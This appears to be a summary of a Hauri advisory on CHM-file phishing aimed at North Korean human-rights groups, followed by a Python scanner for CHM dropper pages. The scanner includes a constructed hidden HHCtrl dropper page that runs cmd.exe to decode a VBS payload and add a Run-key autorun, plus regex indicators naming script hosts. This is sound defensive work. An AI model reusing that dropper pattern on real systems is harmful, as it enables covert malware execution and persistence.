Beware of APT attacks disguised as a specific North Korean defector
2023-05-19 • Hauri • Beware of APT attacks disguised as specific North Korean defectors •
https://hauri.co.kr/security/issue_view.html?intSeq=420&page=1&article_num=331
Hauri warns of malicious emails that impersonated a specific North Korean defector and targeted North Korean human-rights civic organizations. The lure was a ZIP attachment containing a Windows CHM (compiled HTML Help) file whose visible content discussed the difficulties facing North Korean human-rights groups and measures to revitalize them, so recipients were likely to open it as reference material. When the CHM is opened, hidden script logic inside it decodes an encoded malicious script string into two files, mini.dat and mini.vbs, writes them to disk, and registers the VBS for autorun through the registry. The C&C server was already blocked when Hauri analyzed the sample, and Hauri published detections for the phishing email, the CHM dropper, and the VBS downloader.
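The advisory does not say how the CHM's hidden script is built, so the following is an added triage example, not Hauri's code or a signature for this specific sample. It assumes the common CHM-dropper construction, in which a topic page embeds the HTML Help ActiveX control (HHCtrl, CLSID adb880a6-d8ff-11cf-9377-00aa003b7a11) with the "ShortCut" command and an Item1 parameter that launches cmd.exe or a script host, and then auto-clicks it from script. Because CHM content is LZX-compressed, a raw byte scan of the .chm will not see this HTML; extract the archive first (for example with 7-Zip, `7z x lure.chm -oextracted`) and scan the resulting topic pages. The sample pages below are constructed for the example.

```python
import re
from pathlib import Path
from typing import Dict, List

# CLSID of the HTML Help ActiveX control (HHCtrl.ocx). Its "ShortCut" command lets a
# CHM topic page launch an arbitrary program, which is how most CHM droppers run code.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

# Heuristic indicators applied to the decoded HTML of one topic page. They are broad
# on purpose: the goal is triage of a suspicious attachment, not a production signature.
INDICATORS = [
    ("hhctrl_object", re.compile(r"clsid:\s*" + HHCTRL_CLSID, re.I)),
    ("shortcut_command",
     re.compile(r'name\s*=\s*["\']?Command["\']?\s+value\s*=\s*["\']?ShortCut', re.I)),
    ("item1_launches_interpreter",
     re.compile(r'name\s*=\s*["\']?Item1["\']?\s+value\s*=\s*["\'][^"\']*'
                r'(cmd\.exe|powershell|wscript|cscript|mshta|rundll32)', re.I)),
    ("writes_vbs", re.compile(r"\.vbs\b", re.I)),                      # dropped VBS payload
    ("run_key_persistence", re.compile(r"CurrentVersion\\+Run\b", re.I)),  # registry autorun
    ("auto_click", re.compile(r"\.Click\(\)", re.I)),                  # fires the object w/o a user click
    ("hidden_object", re.compile(r"<object[^>]*(width|height)\s*=\s*[\"']?0\b", re.I)),
]


def scan_chm_topic(html: str) -> Dict[str, List[str]]:
    """Return {indicator_name: [matched snippets]} for every indicator present in one page."""
    hits: Dict[str, List[str]] = {}
    for name, rx in INDICATORS:
        found = [m.group(0) for m in rx.finditer(html)]
        if found:
            hits[name] = found
    return hits


def verdict(hits: Dict[str, List[str]]) -> str:
    """HHCtrl object plus a ShortCut/interpreter launch is enough to call the page malicious."""
    if "hhctrl_object" in hits and (
        "shortcut_command" in hits or "item1_launches_interpreter" in hits
    ):
        return "malicious"
    return "suspicious" if hits else "clean"


def scan_extracted_chm(root: str) -> Dict[str, Dict[str, List[str]]]:
    """Scan every topic page under an extracted CHM tree (e.g. after `7z x lure.chm -oout`)."""
    results: Dict[str, Dict[str, List[str]]] = {}
    for path in Path(root).rglob("*"):
        if path.suffix.lower() in (".htm", ".html", ".hhc", ".hhk"):
            hits = scan_chm_topic(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                results[str(path)] = hits
    return results


# Constructed benign topic page: ordinary help text, no embedded objects or script.
BENIGN_TOPIC = "<html><body><h1>Activity report</h1><p>Plain help text.</p></body></html>"

# Constructed stand-in for a dropper topic page (not the Hauri sample). The hidden HHCtrl
# object runs cmd.exe, which decodes a staged payload into a .vbs, registers it under the
# Run key, and the script auto-clicks the object so no user interaction is needed.
DROPPER_TOPIC = """<html><body>
<object id="x" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width="0" height="0">
  <param name="Command" value="ShortCut">
  <param name="Button" value="Bitmap::shortcut">
  <param name="Item1" value=",cmd.exe,/c certutil -decode %TEMP%\\mini.dat %TEMP%\\mini.vbs && reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v mini /t REG_SZ /d %TEMP%\\mini.vbs">
  <param name="Item2" value="273,1,1">
</object>
<script>x.Click();</script>
</body></html>"""


if __name__ == "__main__":
    for label, page in (("benign", BENIGN_TOPIC), ("dropper", DROPPER_TOPIC)):
        hits = scan_chm_topic(page)
        print(f"{label}: {verdict(hits)} {sorted(hits)}")
```

The per-indicator hit list is kept rather than collapsed to a score so an analyst can see which attribute fired (for instance an Item1 value that names a script host), and `scan_extracted_chm` points the same check at a whole extracted archive, which also catches droppers that put the object in the table-of-contents (.hhc) file instead of a topic page.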